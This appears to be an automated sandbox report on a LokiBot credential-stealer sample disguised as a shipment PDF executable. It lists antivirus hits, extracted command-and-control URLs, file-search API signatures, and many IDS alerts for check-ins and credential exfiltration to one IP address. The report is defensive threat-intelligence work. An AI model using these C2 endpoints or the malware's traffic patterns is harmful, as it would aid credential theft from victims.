2025-02-24T08:42:16.940915+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.4	50130	104.21.48.1	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://touxzw.ir/tking3/five/fre.php

Avira URL Cloud: Label: malware

Found malware configuration

Source: 3.2.svchost.exe.400000.0.raw.unpack

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Multi AV Scanner detection for submitted file

Source: Shipment Delivery No DE0093002-PDF.exe	Virustotal: Detection: 32%			Perma Link
Source: Shipment Delivery No DE0093002-PDF.exe	ReversingLabs: Detection: 39%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: Shipment Delivery No DE0093002-PDF.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1705677236.0000000003870000.00000004.00001000.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1706006327.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1720487157.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1719286949.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1705677236.0000000003870000.00000004.00001000.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000000.00000003.1706006327.00000000036D0000.00000004.00001000.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1720487157.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, Shipment Delivery No DE0093002-PDF.exe, 00000002.00000003.1719286949.0000000003BC0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: svchost.exe, svchost.exe, 00000003.00000002.2937954887.00000000006C1000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: svchost.pdbUGP source: svchost.exe, 00000003.00000002.2937954887.00000000006C1000.00000020.00000001.01000000.00000005.sdmp

Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_0012445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0012445A
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_0012C6D1 FindFirstFileW,FindClose,	0_2_0012C6D1
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_0012C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0012C75C
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_0012EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0012EF95
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_0012F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0012F0F2
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_0012F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0012F3F3
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_001237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_001237EF
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_00123B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00123B12
Source: C:\Users\user\Desktop\Shipment Delivery No DE0093002-PDF.exe	Code function: 0_2_0012BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0012BCBC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 3_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,	3_2_00403D74

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49757 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49772 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49772 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49772 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49765 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49739 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49732 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49768 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49742 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49768 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49732 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49739 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49744 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49732 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49766 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49777 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49768 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49766 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49766 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49733 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49735 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49735 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49733 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49739 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49737 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49742 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49733 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49744 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49735 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49765 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49768 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49735 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49732 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49766 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49744 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49737 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49737 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49778 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49737 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49737 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49778 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49733 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49778 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49733 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49741 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49744 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49735 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49765 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49778 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49778 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49808 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49808 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49757 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49808 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49740 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49765 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49758 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49788 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49744 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49788 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49739 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49772 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49772 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49739 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49777 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49777 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49766 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49736 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49746 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49738 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49746 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49768 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49788 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49734 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49783 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49783 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49783 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49734 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49734 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49742 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49736 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49742 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49736 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49742 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49771 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49771 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49771 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49734 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49788 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49758 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49788 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49738 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49777 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49746 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49777 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49760 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49765 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49783 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49783 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49746 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49746 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49750 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49769 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49769 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49769 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49771 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49771 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49768
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49769 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49773 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49773 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49773 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49740 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49741
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49740 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49738 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49780 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49780 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49780 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49780 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49780 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49736 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49736 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49752 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.48.1:80 -> 192.168.2.4:49788
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49773 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49734 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49862 -> 104.21.48.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49738 -> 104.21.48.1:80
